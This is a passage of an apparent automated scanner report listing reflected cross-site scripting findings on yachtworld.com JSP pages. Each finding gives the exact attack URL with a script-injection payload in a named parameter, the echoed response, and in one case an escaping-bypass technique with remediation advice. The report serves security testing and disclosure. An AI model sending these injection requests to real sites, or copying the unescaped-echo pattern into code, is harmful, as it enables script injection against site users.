User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.3.10.1296155835; s_pers=%20s_nr%3D1296155882977%7C1298747882977%3B%20s_lv%3D1296155882978%7C1390763882978%3B%20s_lv_s%3DFirst%2520Visit%7C1296157682978%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:39:37 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 12042

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<script>alert(1)</script>f1f1563518e/boats.header.html:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/starlingmarine6e51f-->
...[SNIP]...

3.455. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail_handler.jsp

Issue detail

The value of the hosturl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50e2b"><script>alert(1)</script>cfc37e3f4a8 was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /core/listing/pl_boat_detail_handler.jsp?slim=broker&hosturl=starlingmarine50e2b"><script>alert(1)</script>cfc37e3f4a8&units=Feet&boat_id=2275416&primary_photo_id=1&back=%2Fcore%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fps%3D50%26slim%3Dbroker%26page%3Dbroker%26ywo%3Dstarlingmarine%26hosturl%3Dstarlingmarine%26luom%3D126&searchtype=buy&hosturl=starlingmarine&&ywo=starlingmarine& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.3.10.1296155835; s_pers=%20s_nr%3D1296155882977%7C1298747882977%3B%20s_lv%3D1296155882978%7C1390763882978%3B%20s_lv_s%3DFirst%2520Visit%7C1296157682978%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:39:17 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 12017

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluster
...[SNIP]...
sting/pl_display_photo.jsp?slim=broker&ybw=&boat_id=2275416&boatname=33%27+Grady+White+330+Express&photo_revised_date=1287073055000&photo_name=Photo+2&photo=2&hosturl=starlingmarine50e2b"><script>alert(1)</script>cfc37e3f4a8&&ywo=starlingmarine&">
...[SNIP]...

3.456. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail_handler.jsp

Issue detail

The value of the hosturl request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d4871'><script>alert(1)</script>279f569358c was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /core/listing/pl_boat_detail_handler.jsp?slim=broker&hosturl=starlingmarined4871'><script>alert(1)</script>279f569358c&units=Feet&boat_id=2275416&primary_photo_id=1&back=%2Fcore%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fps%3D50%26slim%3Dbroker%26page%3Dbroker%26ywo%3Dstarlingmarine%26hosturl%3Dstarlingmarine%26luom%3D126&searchtype=buy&hosturl=starlingmarine&&ywo=starlingmarine& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.3.10.1296155835; s_pers=%20s_nr%3D1296155882977%7C1298747882977%3B%20s_lv%3D1296155882978%7C1390763882978%3B%20s_lv_s%3DFirst%2520Visit%7C1296157682978%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:39:21 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 12018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluster
...[SNIP]...
<a href='/core/listing/pl_display_photo.jsp?&hosturl=starlingmarined4871'><script>alert(1)</script>279f569358c&&ywo=starlingmarine&slim=broker&boat_id=2275416&boatname=33%27+Grady+White+330+Express&photo_revised_date=1287073053000&photo_name=Photo+1&photo=1&url='>
...[SNIP]...

3.457. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [slim parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail_handler.jsp

Issue detail

The value of the slim request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 90877\'%3balert(1)//e8962a8bc3c was submitted in the slim parameter. This input was echoed as 90877\\';alert(1)//e8962a8bc3c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /core/listing/pl_boat_detail_handler.jsp?slim=broker90877\'%3balert(1)//e8962a8bc3c&hosturl=starlingmarine&units=Feet&boat_id=2275416&primary_photo_id=1&back=%2Fcore%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fps%3D50%26slim%3Dbroker%26page%3Dbroker%26ywo%3Dstarlingmarine%26hosturl%3Dstarlingmarine%26luom%3D126&searchtype=buy&hosturl=starlingmarine&&ywo=starlingmarine& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.3.10.1296155835; s_pers=%20s_nr%3D1296155882977%7C1298747882977%3B%20s_lv%3D1296155882978%7C1390763882978%3B%20s_lv_s%3DFirst%2520Visit%7C1296157682978%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:39:07 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 16734

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluster
...[SNIP]...
<a href=\'/core/listing/pl_display_photo.jsp?&hosturl=starlingmarine&&ywo=starlingmarine&slim=broker90877\\';alert(1)//e8962a8bc3c&boat_id=2275416&boatname=33%27+Grady+White+330+Express&photo_revised_date=1287073053000&photo_name=Photo+1&photo=1&url=\'>
...[SNIP]...

3.458. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [slim parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail_handler.jsp

Issue detail

The value of the slim request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2debb"><script>alert(1)</script>c1078a5b984 was submitted in the slim parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /core/listing/pl_boat_detail_handler.jsp?slim=broker2debb"><script>alert(1)</script>c1078a5b984&hosturl=starlingmarine&units=Feet&boat_id=2275416&primary_photo_id=1&back=%2Fcore%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fps%3D50%26slim%3Dbroker%26page%3Dbroker%26ywo%3Dstarlingmarine%26hosturl%3Dstarlingmarine%26luom%3D126&searchtype=buy&hosturl=starlingmarine&&ywo=starlingmarine& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.3.10.1296155835; s_pers=%20s_nr%3D1296155882977%7C1298747882977%3B%20s_lv%3D1296155882978%7C1390763882978%3B%20s_lv_s%3DFirst%2520Visit%7C1296157682978%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:38:55 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 17045

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluster
...[SNIP]...
<A href="/core/listing/pl_display_photo.jsp?slim=broker2debb"><script>alert(1)</script>c1078a5b984&ybw=&boat_id=2275416&boatname=33%27+Grady+White+330+Express&photo_revised_date=1287073055000&photo_name=Photo+2&photo=2&hosturl=starlingmarine&&ywo=starlingmarine&">
...[SNIP]...

3.459. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [slim parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail_handler.jsp

Issue detail

The value of the slim request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8ac5f'><script>alert(1)</script>c1528de4653 was submitted in the slim parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /core/listing/pl_boat_detail_handler.jsp?slim=broker8ac5f'><script>alert(1)</script>c1528de4653&hosturl=starlingmarine&units=Feet&boat_id=2275416&primary_photo_id=1&back=%2Fcore%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fps%3D50%26slim%3Dbroker%26page%3Dbroker%26ywo%3Dstarlingmarine%26hosturl%3Dstarlingmarine%26luom%3D126&searchtype=buy&hosturl=starlingmarine&&ywo=starlingmarine& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.3.10.1296155835; s_pers=%20s_nr%3D1296155882977%7C1298747882977%3B%20s_lv%3D1296155882978%7C1390763882978%3B%20s_lv_s%3DFirst%2520Visit%7C1296157682978%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:38:57 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 17046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluster
...[SNIP]...
<a href='/core/listing/pl_display_photo.jsp?&hosturl=starlingmarine&&ywo=starlingmarine&slim=broker8ac5f'><script>alert(1)</script>c1528de4653&boat_id=2275416&boatname=33%27+Grady+White+330+Express&photo_revised_date=1287073053000&photo_name=Photo+1&photo=1&url='>
...[SNIP]...

3.460. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [units parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail_handler.jsp

Issue detail

The value of the units request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fdd1c'><script>alert(1)</script>4c92ddba914 was submitted in the units parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /core/listing/pl_boat_detail_handler.jsp?slim=broker&hosturl=starlingmarine&units=Feetfdd1c'><script>alert(1)</script>4c92ddba914&boat_id=2049062&primary_photo_id=1&back=%2Fcore%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fps%3D50%26slim%3Dbroker%26page%3Dbroker%26ywo%3Dstarlingmarine%26hosturl%3Dstarlingmarine%26luom%3D126&searchtype=buy&hosturl=starlingmarine&&ywo=starlingmarine& HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response (redirected)

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:29:22 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluster
...[SNIP]...
<a href='/core/listing/pl_boat_full_detail.jsp?slim=broker&boat_id=2049062&ybw=&hosturl=starlingmarine&&ywo=starlingmarine&&units=Feetfdd1c'><script>alert(1)</script>4c92ddba914&access=Public&listing_id=76926&url=&hosturl=starlingmarine&&ywo=starlingmarine&'>
...[SNIP]...

3.461. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp [&ywo parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_full_detail.jsp

Issue detail

The value of the &ywo request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c9a12'><script>alert(1)</script>80081d41593 was submitted in the &ywo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/pl_boat_full_detail.jsp?slim=broker&boat_id=1787065&ybw=&hosturl=donnellyyachts&&ywo=donnellyyachtsc9a12'><script>alert(1)</script>80081d41593&&units=Feet&access=Public&listing_id=65891&url=&hosturl=donnellyyachts&&ywo=donnellyyachts& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/pl_boat_detail.jsp?&units=Feet&id=1787065&lang=en&slim=broker&&hosturl=donnellyyachts&&ywo=donnellyyachts&
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; 